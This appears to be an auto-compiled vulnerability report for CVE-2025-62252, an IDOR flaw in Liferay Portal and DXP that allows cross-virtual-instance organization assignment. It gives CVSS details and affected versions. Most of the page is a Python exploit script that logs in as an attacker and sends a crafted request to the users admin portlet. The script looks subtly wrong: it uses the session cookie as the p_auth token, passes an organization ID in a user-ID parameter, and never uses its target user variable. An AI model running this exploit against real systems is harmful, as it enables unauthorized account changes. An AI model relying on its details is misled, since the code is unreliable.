Security Vulnerability Report
CVE-2025-62252 CVSS 4.3 MEDIUM

Published: 2025-10-13 21:15:35
Last Modified: 2025-12-12 20:35:49

Description

Insecure Direct Object Reference (IDOR) vulnerability in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.10, 7.4 GA through update 92, and older unsupported versions allows remote authenticated users in one virtual instance to assign an organization to a user in a different virtual instance via the _com_liferay_users_admin_web_portlet_UsersAdminPortlet_addUserIds parameter.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* - VULNERABLE
Liferay Portal >= 7.4.0, < 7.4.3.112
Liferay Portal: older unsupported versions
Liferay DXP >= 2023.Q4.0, < 2023.Q4.6
Liferay DXP >= 2023.Q3.1, < 2023.Q3.11
Liferay DXP 7.4 GA through update 92
Liferay DXP: older unsupported versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62252 - Liferay Portal/DXP IDOR Vulnerability PoC
# This PoC demonstrates how an authenticated user in one virtual instance
# can assign an organization from a different virtual instance to a user.

import requests

# Target Liferay Portal instance
TARGET_URL = "https://target-liferay-instance.com"

# Attacker credentials (low-privilege user in Virtual Instance A)
ATTACKER_USER = "attacker_user"
ATTACKER_PASS = "attacker_password"

# Target user ID in Virtual Instance A
TARGET_USER_ID = "12345"

# Organization ID from Virtual Instance B (different virtual instance)
CROSS_INSTANCE_ORG_ID = "67890"

# Step 1: Authenticate as the attacker
session = requests.Session()
login_url = f"{TARGET_URL}/c/portal/login"
login_data = {
    "_com_liferay_login_web_portlet_LoginPortlet_login": ATTACKER_USER,
    "_com_liferay_login_web_portlet_LoginPortlet_password": ATTACKER_PASS,
}
session.post(login_url, data=login_data)

# Step 2: Exploit the IDOR vulnerability via UsersAdminPortlet
# The vulnerable parameter is _com_liferay_users_admin_web_portlet_UsersAdminPortlet_addUserIds
exploit_url = f"{TARGET_URL}/group/control_panel/manage?p_p_id=com_liferay_users_admin_web_portlet_UsersAdminPortlet&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view"

# Craft the malicious request with cross-virtual-instance organization ID
exploit_params = {
    "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_addUserIds": CROSS_INSTANCE_ORG_ID,
    "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_cmd": "updateOrganizations",
    "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_redirect": "",
    "p_auth": session.cookies.get("JSESSIONID", ""),
}

# Step 3: Send the exploit request
response = session.post(exploit_url, data=exploit_params)

if response.status_code == 200:
    print("[+] IDOR exploit successful - Cross-instance organization assigned!")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")
```

References

Vendor Advisory: https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62252
